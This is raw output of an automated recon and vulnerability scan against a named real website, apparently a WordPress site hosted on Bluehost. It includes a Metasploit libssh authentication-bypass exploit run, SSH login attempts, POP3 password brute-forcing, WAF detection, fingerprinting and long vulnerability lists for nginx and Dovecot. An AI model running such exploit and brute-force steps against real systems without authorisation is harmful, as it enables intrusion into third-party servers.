[-] 216.172.168.193:22 - SSH - User 'Fortimanager_Access' on could not connect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================
 RUNNING LIBSSH AUTH BYPASS EXPLOIT CVE-2018-10933
====================================================================================
RHOSTS => www.rhkpa.org
RHOST => www.rhkpa.org
LHOST => 127.0.0.1
LPORT => 4444
[*] 216.172.168.193:22 - Attempting authentication bypass
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 opened... running tests...
====================================================================================
 RUNNING NMAP SCRIPTS
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:10 UTC
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.093s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com

PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
| dns-nsec3-enum:
|_ DNSSEC NSEC3 not supported
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.35 (97%), Linux 3.10 (97%), Linux 3.4 (97%), Linux 3.5 (97%), Linux 3.7 (97%), Linux 4.2 (97%), Linux 4.4 (97%), Synology DiskStation Manager 5.1 (97%), Linux 3.1 - 3.2 (97%)
No exact OS matches for host (test conditions non-ideal).

Host script results:
| dns-brute:
| DNS Brute-force hostnames:
| www.rhkpa.org - 216.172.168.193
|_ ftp.rhkpa.org - 216.172.168.193

TRACEROUTE
HOP RTT ADDRESS
1 93.09 ms box6011.bluehost.com (216.172.168.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 610.36 seconds
 + -- --=[Port 67 closed... skipping.
 + -- --=[Port 68 closed... skipping.
 + -- --=[Port 69 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 80 opened... running tests...
====================================================================================
 RUNNING NMAP HTTP SCRIPTS
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:20 UTC
NSE: Loaded 164 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:20
Completed Parallel DNS resolution of 1 host. at 13:20, 0.08s elapsed
Initiating SYN Stealth Scan at 13:20
Scanning www.rhkpa.org (216.172.168.193) [1 port]
Discovered open port 80/tcp on 216.172.168.193
Completed SYN Stealth Scan at 13:20, 0.15s elapsed (1 total ports)
Initiating Service scan at 13:20
Scanning 1 service on www.rhkpa.org (216.172.168.193)
Completed Service scan at 13:20, 5.59s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against www.rhkpa.org (216.172.168.193)
Retrying OS detection (try #2) against www.rhkpa.org (216.172.168.193)
NSE: Script scanning 216.172.168.193.
Initiating NSE at 13:20
NSE Timing: About 42.81% done; ETC: 13:21 (0:00:41 remaining)
NSE Timing: About 84.19% done; ETC: 13:23 (0:00:30 remaining)
NSE Timing: About 83.33% done; ETC: 13:24 (0:00:38 remaining)
NSE Timing: About 83.16% done; ETC: 13:25 (0:00:46 remaining)
NSE Timing: About 83.95% done; ETC: 13:26 (0:00:53 remaining)
NSE Timing: About 83.77% done; ETC: 13:27 (0:01:04 remaining)
Completed NSE at 13:30, 600.96s elapsed
Initiating NSE at 13:30
Completed NSE at 13:30, 3.01s elapsed
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.092s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com

PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.1
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-brute:
|_ Path "/" does not require authentication
|_http-chrono: Request times for /; avg: 3526.78ms; min: 1070.63ms; max: 5825.42ms
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-errors: Couldn't find any error pages.
|_http-feed: Couldn't find any feeds.
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-headers:
| Server: nginx/1.14.1
| Date: Wed, 02 Oct 2019 13:26:33 GMT
| Content-Type: text/html; charset=UTF-8
| Transfer-Encoding: chunked
| Connection: close
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate
| Pragma: no-cache
| X-Redirect-By: WordPress
| Set-Cookie: PHPSESSID=raciocdpvjmrrs03sdufnl2rj3; path=/
| Set-Cookie: pmpro_visit=1; path=/
| Location: https://www.rhkpa.org/
| X-Server-Cache: true
| X-Proxy-Cache: EXPIRED
|
|_ (Request type: GET)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-mobileversion-checker: ERROR: Script execution failed (use -d to debug)
|_http-security-headers:
|_http-server-header: nginx/1.14.1
| http-sitemap-generator:
| Directory structure:
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-traceroute: ERROR: Script execution failed (use -d to debug)
|_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
| http-vhosts:
| 76 names had status ERROR
|_51 names had status 200
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-xssed: No previously reported XSS vuln.
| vulscan: VulDB - https://vuldb.com:
| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
|
| MITRE CVE - https://cve.mitre.org:
|
| SecurityFocus - https://www.securityfocus.com/bid/:
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
|
| Exploit-DB - https://www.exploit-db.com:
| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
| [25499] nginx 1.3.9-1.4.0 DoS PoC
|
| OpenVAS (Nessus) - http://www.openvas.org:
|
1040| SecurityTracker - https://www.securitytracker.com:
1041| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
1042| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
1043| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
1044| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
1045|
1046| OSVDB - http://www.osvdb.org:
1047| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
1048| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
1049| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
1050| [92796] nginx ngx_http_close_connection Function Crafted r->
1051| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
1052| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
1053| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
1054| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
1055| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
1056| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
1057| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
1058| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
1059| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
1060| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
1061| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
1062| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
1063| [62617] nginx Internal DNS Cache Poisoning Weakness
1064| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
1065| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
1066| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
1067| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
1068| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
1069| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
1070| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
1071| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
1072| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
1073| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
1074|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.32 or 3.10 (97%), Linux 2.6.35 (97%), Linux 3.4 (97%), Linux 3.5 (97%), Linux 3.7 (97%), Linux 4.2 (97%), Linux 4.4 (97%), Synology DiskStation Manager 5.1 (97%), WatchGuard Fireware 11.8 (97%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 7.435 days (since Wed Sep 25 03:04:48 2019)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 92.25 ms box6011.bluehost.com (216.172.168.193)

NSE: Script Post-scanning.
Initiating NSE at 13:30
Completed NSE at 13:30, 0.00s elapsed
Initiating NSE at 13:30
Completed NSE at 13:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 618.84 seconds
 Raw packets sent: 83 (7.456KB) | Rcvd: 17 (1.400KB)
====================================================================================
 CHECKING FOR WAF
====================================================================================

 WAFW00F - Web Application Firewall Detection Tool


Checking http://www.rhkpa.org
The site http://www.rhkpa.org is behind ModSecurity (SpiderLabs) WAF.
Number of requests: 5

====================================================================================
 GATHERING HTTP INFO
====================================================================================
http://www.rhkpa.org [301 Moved Permanently] Cookies[MAILPOET_SESSION,PHPSESSID,pmpro_visit], Country[UNITED STATES][US], HTTPServer[nginx/1.14.1], IP[216.172.168.193], RedirectLocation[https://www.rhkpa.org/], UncommonHeaders[x-redirect-by,x-server-cache,x-proxy-cache], nginx[1.14.1]
https://www.rhkpa.org/ [200 OK] Cookies[MAILPOET_SESSION,PHPSESSID,pmpro_visit], Country[UNITED STATES][US], HTML5, HTTPServer[nginx/1.14.1], IP[216.172.168.193], JQuery[5.2.3], MetaGenerator[WordPress Download Manager 3.0.2], PoweredBy[Paid], Script[text/javascript], Title[RHKPA | Royal Hong Kong Police Association], UncommonHeaders[link,x-et-api-version,x-et-api-root,x-et-api-origin,x-tec-api-version,x-tec-api-root,x-tec-api-origin,x-server-cache,x-proxy-cache], WordPress, nginx[1.14.1]
====================================================================================
 GATHERING SERVER INFO
====================================================================================

wig - WebApp Information Gatherer


====================================================================================
 CHECKING HTTP HEADERS
====================================================================================
HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Wed, 02 Oct 2019 13:32:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Redirect-By: WordPress
Set-Cookie: PHPSESSID=i0mvq3jo8i9jo2ef36eqonivo5; path=/
Set-Cookie: MAILPOET_SESSION=%221dnmh46dbchwk0k4ks400swkokoggcwo%22; expires=Thu, 03-Oct-2019 13:02:12 GMT; Max-Age=84600; path=/
Set-Cookie: pmpro_visit=1; path=/
Location: https://www.rhkpa.org/

HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.1
Date: Wed, 02 Oct 2019 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Redirect-By: WordPress
Set-Cookie: PHPSESSID=7csgg38u71l0bbuernd5uo8f33; path=/
Set-Cookie: MAILPOET_SESSION=%227x43h992ngws8owkc848gcogc08c0sc8%22; expires=Thu, 03-Oct-2019 13:02:14 GMT; Max-Age=84600; path=/
Set-Cookie: pmpro_visit=1; path=/
Location: https://www.rhkpa.org/

====================================================================================
 GATHERING WEB FINGERPRINT
====================================================================================
 jQuery Migrate
 WooCommerce 3.7.0
 WordPress
 Bootstrap
 jQuery 1.12.4
 Nginx 1.14.1
 Google Font API
 X-ET-API-VERSION: v1
 X-ET-API-ROOT: https://www.rhkpa.org/wp-json/tribe/tickets/v1/
 X-ET-API-ORIGIN: https://www.rhkpa.org
 X-TEC-API-VERSION: v1
 X-TEC-API-ROOT: https://www.rhkpa.org/wp-json/tribe/events/v1/
 X-TEC-API-ORIGIN: https://www.rhkpa.org
 X-Server-Cache: false
====================================================================================
 DISPLAYING META GENERATOR TAGS
====================================================================================
====================================================================================
 DISPLAYING COMMENTS
====================================================================================
====================================================================================
 DISPLAYING SITE LINKS
====================================================================================
====================================================================================
 SAVING SCREENSHOTS
====================================================================================
webscreenshot.py version 2.2.1

[+] 1 URLs to be screenshot
[ERROR][http://www.rhkpa.org:80] renderer binary could not have been found in your current PATH environment variable, exiting
[+] 0 actual URLs screenshot
[+] 1 error(s)
 http://www.rhkpa.org:80
 + -- --=[Port 110 opened... running tests...
====================================================================================
 RUNNING NMAP SCRIPTS
====================================================================================
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:32 UTC
Nmap scan report for www.rhkpa.org (216.172.168.193)
Host is up (0.13s latency).
rDNS record for 216.172.168.193: box6011.bluehost.com

PORT STATE SERVICE VERSION
110/tcp open pop3 Dovecot pop3d
1207| pop3-brute:
1208| Accounts: No valid accounts found
1209| Statistics: Performed 252 guesses in 219 seconds, average tps: 1.2
1210|_ ERROR: Failed to connect.
1211|_pop3-capabilities: USER RESP-CODES UIDL STLS AUTH-RESP-CODE CAPA SASL(PLAIN LOGIN) TOP PIPELINING
1212| vulscan: VulDB - https://vuldb.com:
1213| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
1214| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
1215| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
1216| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
1217| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
1218| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
1219| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
1220| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
1221| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
1222| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
1223| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
1224| [69835] Dovecot 2.2.0/2.2.1 denial of service
1225| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
1226| [65684] Dovecot up to 2.2.6 unknown vulnerability
1227| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
1228| [63692] Dovecot up to 2.0.15 spoofing
1229| [7062] Dovecot 2.1.10 mail-search.c denial of service
1230| [57517] Dovecot up to 2.0.12 Login directory traversal
1231| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
1232| [57515] Dovecot up to 2.0.12 Crash denial of service
1233| [54944] Dovecot up to 1.2.14 denial of service
1234| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
1235| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
1236| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
1237| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
1238| [53277] Dovecot up to 1.2.10 denial of service
1239| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
1240| [45256] Dovecot up to 1.1.5 directory traversal
1241| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
1242| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
1243| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
1244| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
1245| [40356] Dovecot 1.0.9 Cache unknown vulnerability
1246| [38222] Dovecot 1.0.2 directory traversal
1247| [36376] Dovecot up to 1.0.x directory traversal
1248| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
1249|
1250| MITRE CVE - https://cve.mitre.org:
1251| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
1252| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
1253| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
1254| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
1255| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
1256| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
1257| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
1258| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
1259| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
1260| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
1261| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
1262| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
1263| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
1264| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
1265| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
1266| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
1267| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
1268| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
1269| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
1270| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
1271| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
1272| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
1273| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
1274| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
1275| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
1276| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
1277| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
1278| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
1279| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
1280| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
1281| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
1282| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
1283| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
1284| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
1285| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
1286| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
1287| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
1288|
1289| SecurityFocus - https://www.securityfocus.com/bid/:
1290| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
1291| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
1292| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
1293| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
1294| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
1295| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
1296| [67306] Dovecot Denial of Service Vulnerability
1297| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
1298| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
1299| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
1300| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
1301| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
1302| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
1303| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
1304| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
1305| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
1306| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
1307| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
1308| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
1309| [39838] tpop3d Remote Denial of Service Vulnerability
1310| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
1311| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
1312| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
1313| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
1314| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
1315| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
1316| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
1317| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
1318| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
1319| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
1320| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
1321| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
1322| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
1323| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
1324| [17961] Dovecot Remote Information Disclosure Vulnerability
1325| [16672] Dovecot Double Free Denial of Service Vulnerability
1326| [8495] akpop3d User Name SQL Injection Vulnerability
1327| [8473] Vpop3d Remote Denial Of Service Vulnerability
1328| [3990] ZPop3D Bad Login Logging Failure Vulnerability
1329| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
1330|
1331| IBM X-Force - https://exchange.xforce.ibmcloud.com:
1332| [86382] Dovecot POP3 Service denial of service
1333| [84396] Dovecot IMAP APPEND denial of service
1334| [80453] Dovecot mail-search.c denial of service
1335| [71354] Dovecot SSL Common Name (CN) weak security
1336| [67675] Dovecot script-login security bypass
1337| [67674] Dovecot script-login directory traversal
1338| [67589] Dovecot header name denial of service
1339| [63267] Apple Mac OS X Dovecot information disclosure
1340| [62340] Dovecot mailbox security bypass
1341| [62339] Dovecot IMAP or POP3 denial of service
1342| [62256] Dovecot mailbox security bypass
1343| [62255] Dovecot ACL entry security bypass
1344| [60639] Dovecot ACL plugin weak security
1345| [57267] Apple Mac OS X Dovecot Kerberos security bypass
1346| [56763] Dovecot header denial of service
1347| [54363] Dovecot base_dir privilege escalation
1348| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
1349| [46323] Dovecot dovecot.conf information disclosure
1350| [46227] Dovecot message parsing denial of service
1351| [45669] Dovecot ACL mailbox security bypass
1352| [45667] Dovecot ACL plugin rights security bypass
1353| [41085] Dovecot TAB characters authentication bypass
1354| [41009] Dovecot mail_extra_groups option unauthorized access
1355| [39342] Dovecot LDAP auth cache configuration security bypass
